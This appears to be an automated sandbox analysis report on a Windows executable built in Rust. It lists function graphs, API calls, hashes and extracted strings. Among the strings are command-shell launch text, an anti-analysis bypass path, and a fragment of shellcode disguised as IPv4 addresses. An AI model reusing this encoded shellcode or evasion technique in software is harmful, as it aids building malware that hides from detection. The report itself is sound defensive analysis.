                                      • Opcode ID: 51943ae258cae9eb5cc6b9ba16fba8e201f35c60dc68db3363a18acbdffd4609
                                      • Instruction ID: ba2084984ff0f7d330943acc6c72c009f37df5ef04bcede22c9c9f2a2af3f1d2
                                      • Opcode Fuzzy Hash: 51943ae258cae9eb5cc6b9ba16fba8e201f35c60dc68db3363a18acbdffd4609
                                      • Instruction Fuzzy Hash: FB614E32A04A4185EB40EF5AD8C03AC77B0FB49764FD4823AD99C633A4DF7C9585C760
                                      Function 00007FF7D4325220 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 132stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1225 7ff7d4325220-7ff7d432dcff strlen call 7ff7d4327a60 call 7ff7d4338570 1231 7ff7d432dd01-7ff7d432dd0d call 7ff7d432cb70 1225->1231 1232 7ff7d432dd12-7ff7d432dd3d call 7ff7d433bcf0 1225->1232 1237 7ff7d432dd92-7ff7d432dda5 call 7ff7d4337f90 1231->1237 1238 7ff7d432dd3f-7ff7d432dd43 1232->1238 1239 7ff7d432dd74-7ff7d432dd7e 1232->1239 1248 7ff7d432ddab-7ff7d432de08 call 7ff7d433c230 call 7ff7d43385b0 1237->1248 1249 7ff7d432df7f-7ff7d432dfb2 call 7ff7d435c660 1237->1249 1238->1239 1240 7ff7d432dd45-7ff7d432dd6e 1238->1240 1239->1237 1241 7ff7d432dd80-7ff7d432dd8d call 7ff7d43272b0 1239->1241 1240->1239 1243 7ff7d432df64-7ff7d432df6e 1240->1243 1241->1237 1246 7ff7d432df70-7ff7d432df7d 1243->1246 1247 7ff7d432df55-7ff7d432df63 1243->1247 1250 7ff7d432df50 call 7ff7d43272b0 1246->1250 1261 7ff7d432dfb7-7ff7d432dfe9 call 7ff7d435c660 1248->1261 1262 7ff7d432de0e-7ff7d432de5b call 7ff7d43440e0 memmove call 7ff7d4338590 1248->1262 1257 7ff7d432e038-7ff7d432e05e 1249->1257 1250->1247 1259 7ff7d432e079-7ff7d432e084 1257->1259 1260 7ff7d432e060-7ff7d432e074 call 7ff7d43272b0 1257->1260 1260->1259 1261->1257 1270 7ff7d432dfeb-7ff7d432e003 call 7ff7d435c330 1262->1270 1271 7ff7d432de61-7ff7d432debc call 7ff7d43441d0 * 3 call 7ff7d433c330 1262->1271 1270->1257 1281 7ff7d432dec1-7ff7d432dec8 1271->1281 1282 7ff7d432dece-7ff7d432df23 call 7ff7d432d920 call 7ff7d432da60 1281->1282 1283 7ff7d432e005-7ff7d432e033 call 7ff7d435c660 1281->1283 1289 7ff7d432df37-7ff7d432df41 1282->1289 1290 7ff7d432df25-7ff7d432df32 call 7ff7d43272b0 1282->1290 1283->1257 1289->1247 1292 7ff7d432df43-7ff7d432df49 1289->1292 1290->1289 1292->1250
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memmovestrlen
                                      • String ID: cmd/ccalled `Option::unwrap()` on a `None` value$start
                                      • API String ID: 3405231851-2956442273
                                      • Opcode ID: aa2bc6b55a83bf6b09b9fe5ccb2b07714f5f5da40d931208fd8a12dbd3386655
                                      • Instruction ID: 793a72356d13cf2a82fa465bbb3c2a459e76ec90182decf3e349b2258cf752f1
                                      • Opcode Fuzzy Hash: aa2bc6b55a83bf6b09b9fe5ccb2b07714f5f5da40d931208fd8a12dbd3386655
                                      • Instruction Fuzzy Hash: CD51B562605BC154EB70AF2AD8857EC6721FB54798FC08136DE4D6BA99DF28D289C310
                                      Function 00007FF7D432CEB0 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 246COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1293 7ff7d432ceb0-7ff7d432cf2f call 7ff7d43440e0 call 7ff7d43441d0 call 7ff7d433c3d0 1299 7ff7d432cf34-7ff7d432cf3c 1293->1299 1300 7ff7d432cf42-7ff7d432cfda call 7ff7d432cc40 call 7ff7d4325660 call 7ff7d434cd40 call 7ff7d4331b10 1299->1300 1301 7ff7d432d24f-7ff7d432d2eb call 7ff7d435c660 call 7ff7d432cb20 1299->1301 1314 7ff7d432cfdc-7ff7d432cfe0 1300->1314 1315 7ff7d432cfe2-7ff7d432cfe7 call 7ff7d434cff0 1300->1315 1316 7ff7d432cfec-7ff7d432d02d call 7ff7d435d3d0 1314->1316 1315->1316 1320 7ff7d432d030-7ff7d432d052 call 7ff7d434d550 1316->1320 1323 7ff7d432d054-7ff7d432d07f 1320->1323 1324 7ff7d432d085-7ff7d432d0d2 call 7ff7d434d1c0 1323->1324 1325 7ff7d432d176-7ff7d432d197 1323->1325 1335 7ff7d432d0d6-7ff7d432d0f7 1324->1335 1326 7ff7d432d199-7ff7d432d1a7 1325->1326 1327 7ff7d432d1c5-7ff7d432d1cf 1325->1327 1326->1327 1329 7ff7d432d1a9-7ff7d432d1c0 call 7ff7d43272b0 1326->1329 1330 7ff7d432d1d1-7ff7d432d1d4 1327->1330 1331 7ff7d432d1e4-7ff7d432d1ee 1327->1331 1329->1327 1330->1331 1334 7ff7d432d1d6-7ff7d432d1df call 7ff7d43272b0 1330->1334 1336 7ff7d432d1fe-7ff7d432d208 1331->1336 1337 7ff7d432d1f0-7ff7d432d1f9 call 7ff7d43272b0 1331->1337 1334->1331 1339 7ff7d432d0f9-7ff7d432d105 1335->1339 1340 7ff7d432d12f-7ff7d432d148 1335->1340 1342 7ff7d432d20a-7ff7d432d217 call 7ff7d43272b0 1336->1342 1343 7ff7d432d21c-7ff7d432d247 1336->1343 1337->1336 1344 7ff7d432d248-7ff7d432d24a 1339->1344 1345 7ff7d432d10b-7ff7d432d116 1339->1345 1346 7ff7d432d14a-7ff7d432d15a memcmp 1340->1346 1347 7ff7d432d120-7ff7d432d12d 1340->1347 1342->1343 1349 7ff7d432d161-7ff7d432d172 1344->1349 1345->1335 1346->1347 1350 7ff7d432d15c 1346->1350 1347->1339 1347->1340 1349->1326 1351 7ff7d432d174 1349->1351 1350->1349 1351->1327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle$memmove
                                      • String ID: called `Result::unwrap()` on an `Err` value$curlip.sbbypass\anti\src\lib.rs
                                      • API String ID: 3228343985-4197622328
                                      • Opcode ID: 545fbd9f6fd30686cdb4edb0937e437c3d3e20a67197cde60f817635b9441185
                                      • Instruction ID: 92fc8f3fb6d4d3ef0fad430543660eec10c0852d8223dc75b81826aac4f0184e
                                      • Opcode Fuzzy Hash: 545fbd9f6fd30686cdb4edb0937e437c3d3e20a67197cde60f817635b9441185
                                      • Instruction Fuzzy Hash: 6AB19222A04BC584EB21AF6ED8813EDB360FF55798F844236DE9D3AA95DF38D245C350
                                      Function 00007FF7D4343D10 Relevance: 3.1, APIs: 2, Instructions: 99fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1365 7ff7d4343d10-7ff7d4343d1e 1366 7ff7d4343e65-7ff7d4343e7f call 7ff7d435cbd0 1365->1366 1367 7ff7d4343d24-7ff7d4343d32 1365->1367 1369 7ff7d4343d48-7ff7d4343d4f 1367->1369 1370 7ff7d4343d34-7ff7d4343d40 1367->1370 1374 7ff7d4343e47-7ff7d4343e60 call 7ff7d435cd30 1369->1374 1375 7ff7d4343d55-7ff7d4343d8c ReadFile 1369->1375 1372 7ff7d4343e28-7ff7d4343e41 call 7ff7d435cd30 1370->1372 1373 7ff7d4343d46 1370->1373 1372->1374 1372->1375 1373->1369 1377 7ff7d4343da9-7ff7d4343dc4 GetLastError 1375->1377 1378 7ff7d4343d8e 1375->1378 1381 7ff7d4343dc6-7ff7d4343dc9 1377->1381 1382 7ff7d4343de3 1377->1382 1384 7ff7d4343d92-7ff7d4343d9a 1378->1384 1387 7ff7d4343e0e-7ff7d4343e12 1381->1387 1388 7ff7d4343dcb-7ff7d4343dd9 1381->1388 1389 7ff7d4343de8-7ff7d4343e06 call 7ff7d4332840 1382->1389 1385 7ff7d4343d9c-7ff7d4343da7 1384->1385 1386 7ff7d4343ddb 1384->1386 1390 7ff7d4343ddf-7ff7d4343de1 1385->1390 1386->1390 1392 7ff7d4343e14-7ff7d4343e1d 1387->1392 1388->1389 1394 7ff7d4343e08-7ff7d4343e0c 1389->1394 1395 7ff7d4343e1e-7ff7d4343e23 1389->1395 1390->1392 1394->1384 1394->1387 1395->1385
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastRead
                                      • String ID:
                                      • API String ID: 1948546556-0
                                      • Opcode ID: 5ecbb810fc304ec23de16c7c625d7a6246dba0ef6827bdf1a41db09a6f84a1ec
                                      • Instruction ID: 7b301c0562c43649a932b3d7578b1caa7b37910acb6a300d04919b728e73bf75
                                      • Opcode Fuzzy Hash: 5ecbb810fc304ec23de16c7c625d7a6246dba0ef6827bdf1a41db09a6f84a1ec
                                      • Instruction Fuzzy Hash: 3C41813270974581EB68AF2AE4803BDA7A1EB45B84FD4443ADA5D977D4CF3DE490C720
                                      Function 00007FF7D43385B0 Relevance: 2.6, APIs: 2, Instructions: 106COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1396 7ff7d43385b0-7ff7d433860e call 7ff7d4340700 1399 7ff7d4338618-7ff7d433861f 1396->1399 1400 7ff7d4338610-7ff7d4338613 1396->1400 1401 7ff7d43386e2 1399->1401 1402 7ff7d4338625-7ff7d433863b 1399->1402 1403 7ff7d43386ef-7ff7d4338702 1400->1403 1405 7ff7d43386e5-7ff7d43386e9 CloseHandle 1401->1405 1404 7ff7d4338660-7ff7d4338672 call 7ff7d4340e60 1402->1404 1407 7ff7d4338677-7ff7d433867c 1404->1407 1405->1403 1408 7ff7d433867e-7ff7d433868d 1407->1408 1409 7ff7d43386a0-7ff7d43386a7 1407->1409 1408->1409 1410 7ff7d43386a9-7ff7d43386af 1409->1410 1411 7ff7d4338703-7ff7d4338706 1409->1411 1412 7ff7d4338708-7ff7d4338754 call 7ff7d435c700 CloseHandle 1410->1412 1413 7ff7d43386b1-7ff7d43386be 1410->1413 1411->1405 1413->1404 1414 7ff7d43386c0 1413->1414 1414->1401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorHandleInformationLast
                                      • String ID:
                                      • API String ID: 3280377019-0
                                      • Opcode ID: 3ee0296b2cb179a6af9dcf14ba0595089c0eb5be205ba48ddf88a4e20561c05c
                                      • Instruction ID: dbf4162bebe56185aac3a3174ce50bac337b852fdae519f4208889c057f4aa34
                                      • Opcode Fuzzy Hash: 3ee0296b2cb179a6af9dcf14ba0595089c0eb5be205ba48ddf88a4e20561c05c
                                      • Instruction Fuzzy Hash: C131B622F186559AF711EFAAE8447AD6770BB447A8FC44536DE4C22B94CF3CD186C310
                                      Function 00007FF7D43329B0 Relevance: 2.5, APIs: 2, Instructions: 22COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1417 7ff7d43329b0-7ff7d43329f9 call 7ff7d4343f70 CloseHandle * 2
                                      APIs
                                        • Part of subcall function 00007FF7D4343F70: CancelIo.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF7D43329CD), ref: 00007FF7D4343F9C
                                        • Part of subcall function 00007FF7D4343F70: GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF7D43329CD), ref: 00007FF7D4343FBE
                                      • CloseHandle.KERNELBASE(?,?,00000000,?,?,00007FF7D4343AD3), ref: 00007FF7D43329DC
                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF7D4343AD3), ref: 00007FF7D43329E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CancelOverlappedResult
                                      • String ID:
                                      • API String ID: 3064327366-0
                                      • Opcode ID: 449e392ad8b4cab362e3c14d2863a26b2d06bc48f358e9735b842bfa8f8402b3
                                      • Instruction ID: 81ff71836ed2eb613c1c7bdbab35010071f2d279668dee7c3c5bb64a83f3e03c
                                      • Opcode Fuzzy Hash: 449e392ad8b4cab362e3c14d2863a26b2d06bc48f358e9735b842bfa8f8402b3
                                      • Instruction Fuzzy Hash: 7AE06D26B24B6596E720AB66E9405AC6730BB847F0F504736DF7D23BD8CF34E4628720
                                      Function 00007FF7D4348AA0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7D4348B01
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: d7e1c8bbf559339db21ccdcf0e93c2523246a71008db3d7c1647071cb9d6d139
                                      • Instruction ID: 7e199ec7a51134d0ecba1cab4ba9385bf08399320ba9a54b083b9eb6c7794b1d
                                      • Opcode Fuzzy Hash: d7e1c8bbf559339db21ccdcf0e93c2523246a71008db3d7c1647071cb9d6d139
                                      • Instruction Fuzzy Hash: F4219572A08B8182E6559F09F5803BEE360FF943D0F948235E7CD16AA4DF3CD5458700
                                      Function 00007FF7D43386D0 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D432DE05), ref: 00007FF7D43386E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 54aa6f87487bae02c1bcd4deae3fcd98bce8bc8ffe17e65ba92b29f21d3508a3
                                      • Instruction ID: 385b2cf7a57b4c486cf45829f4718d5147b2127e52855541661fa650c90a7e56
                                      • Opcode Fuzzy Hash: 54aa6f87487bae02c1bcd4deae3fcd98bce8bc8ffe17e65ba92b29f21d3508a3
                                      • Instruction Fuzzy Hash: B7F06823F1861542FA15AF9AE98536D92947F44B98FC40437DE4D66754CF3CE1C28211
                                      Function 00007FF7D4338644 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle$FileObjectSingleWaitWrite
                                      • String ID:
                                      • API String ID: 1197516534-0
                                      • Opcode ID: ac7523652c1a9ed54011a6fe966dd85e651e47d7a99329cb94beb36c4bbd6dde
                                      • Instruction ID: 885abafdaab91ed89bd2bed5eaa18a9701e48d69c434c707e7fb84d5aa9d1b09
                                      • Opcode Fuzzy Hash: ac7523652c1a9ed54011a6fe966dd85e651e47d7a99329cb94beb36c4bbd6dde
                                      • Instruction Fuzzy Hash: 75F06263B1461086F715EF6AE8953AE6264BB40B98F80043ADE0D27754CF3CE1D28210
                                      Function 00007FF7D4348C9F Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseCryptCurrentHandleProcessRandom
                                      • String ID:
                                      • API String ID: 837579515-0
                                      • Opcode ID: f1d5dfea6900067569ec1c231c8e48ae001120cc24dc752beeb047049223b3ef
                                      • Instruction ID: 187a7338f51465418511c4d976c30f26bcffe1ee5d1a653592568dce7c1cf401
                                      • Opcode Fuzzy Hash: f1d5dfea6900067569ec1c231c8e48ae001120cc24dc752beeb047049223b3ef
                                      • Instruction Fuzzy Hash: B0F0BE36A0950182E719AF2ED9803ECE251EB05BA4FC80036DF4C67AD4CF7CE8E19350

                                      Non-executed Functions

                                      Function 00007FF7D4321880 Relevance: 90.0, APIs: 36, Strings: 15, Instructions: 789libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$AddressCaptureContextCurrentDirectoryEntryFunctionLibraryLoadLookupObjectProcSingleWaitmemset
                                      • String ID: EnumerateLoadedModulesW64$SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymQueryInlineTrace$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll$internal error: entered unreachable code/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\vec\mod.rs$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                      • API String ID: 2237928666-3866678080
                                      • Opcode ID: 2e0697ca662406930e799439386a56be8149fb00d7aadfcf2c859596d334c49c
                                      • Instruction ID: 04f1568d55e5225db70218b4387a9f6f665c4213440ed21a4abc1eb59de7a4e0
                                      • Opcode Fuzzy Hash: 2e0697ca662406930e799439386a56be8149fb00d7aadfcf2c859596d334c49c
                                      • Instruction Fuzzy Hash: 4C926331A09AC199EB319F2AEC803ED77A4FB44799FC4013ADA4D6BB94DF399245C350
                                      Function 00007FF7D434C080 Relevance: 39.1, APIs: 11, Strings: 11, Instructions: 629libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcessmemset
                                      • String ID: ($($SymAddrIncludeInlineTrace$SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$SymQueryInlineTrace$X$X$called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                      • API String ID: 3017635649-3223535655
                                      • Opcode ID: 8992c0ac207b2bf095a1048dad7957f7d4498f68d30f6f66bb6674a7cb82d803
                                      • Instruction ID: 44d36bfd36c1399cce7b680a3796f63cd3c94e478aca8e5a6c6619295f8f64b0
                                      • Opcode Fuzzy Hash: 8992c0ac207b2bf095a1048dad7957f7d4498f68d30f6f66bb6674a7cb82d803
                                      • Instruction Fuzzy Hash: 4242AD21A08A8282FB35AF1EE8857FEA760FB84794FC1413ADA8D13794DE3DD145CB50
                                      Function 00007FF7D432390F Relevance: 21.8, APIs: 7, Strings: 5, Instructions: 755COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AddressErrorLastWait
                                      • String ID: Box<dyn Any>aborting due to panic at $RUST_BACKTRACEfailed to write the buffered data$full$internal error: entered unreachable code/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\vec\mod.rs$main
                                      • API String ID: 1574541344-3767916208
                                      • Opcode ID: cf9ea439bbed6309da8b0fb5e87ed36c06bd380235b973d50af1b4e1a94eb416
                                      • Instruction ID: 8cd22d17cb9bdee60e5c41730aee4961b0c698f35a6932d44a333a65bd6e38b6
                                      • Opcode Fuzzy Hash: cf9ea439bbed6309da8b0fb5e87ed36c06bd380235b973d50af1b4e1a94eb416
                                      • Instruction Fuzzy Hash: 6F72A372A08B8185EB65AF2AD8C43AC7360FB15B58FD0413BCA5D6B794DF78D585C320
                                      Function 00007FF7D4326440 Relevance: 20.1, APIs: 3, Strings: 10, Instructions: 594COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memmove
                                      • String ID: 252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102.129.1$401$403$Invalid UTF-8 sequence$attempt to calculate the remainder with a divisor of zero$called `Result::unwrap()` on an `Err` value$cryp$cryp$cryp$cryp
                                      • API String ID: 2162964266-1709460868
                                      • Opcode ID: 2178f9af50b5d916e908578593d1f9af5006237e6be56684ae9408c1c753f351
                                      • Instruction ID: 53a7b33ae95fe1bb3a23781945b408e8c15cd73e3382f9395828dd8734ccbaba
                                      • Opcode Fuzzy Hash: 2178f9af50b5d916e908578593d1f9af5006237e6be56684ae9408c1c753f351
                                      • Instruction Fuzzy Hash: D2527262608BC689EB61AF2AD8C03EDB760FB44788FC4413BDA4D57A99DF38D255C350
